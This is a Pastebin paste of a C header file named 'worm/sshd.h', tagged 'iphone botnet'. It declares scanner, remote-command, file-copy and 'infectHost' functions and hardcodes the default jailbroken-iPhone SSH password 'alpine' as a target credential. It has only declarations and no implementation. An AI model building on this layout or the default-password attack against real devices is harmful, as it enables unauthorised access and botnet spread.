Advertisement
FlyFar

worm/sshd.h

Mar 24th, 2024
636
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.70 KB | Cybersecurity | 0 0
  1. #include <sys/fcntl.h>
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <sys/time.h>
  5. #include <unistd.h>
  6. #include <sys/types.h>
  7. #include <sys/socket.h>
  8. #include <netinet/in.h>
  9. #include <netdb.h>
  10. #include <arpa/inet.h>
  11. #include <syslog.h>
  12. #include <errno.h>
  13. #include <ifaddrs.h>
  14. #include <string.h>
  15.  
  16. #define VULN_PASS "alpine"
  17.  
  18. void scanner(char *ipRange);
  19. int scanHost(char* host);
  20. int checkHost(char *host);
  21. int runCommand(char* command, char *host);
  22. int prunCommand(char* command, char *host);
  23. int CopyFile(char* src, char* dst, char* host);
  24. int infectHost(char *host);
  25. char *randHost(void);
  26. int get_lock(void);
  27. char *getAddrRange();
  28. int tokenise (char input[], char *token[], char* spl);
Tags: iphone botnet duh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement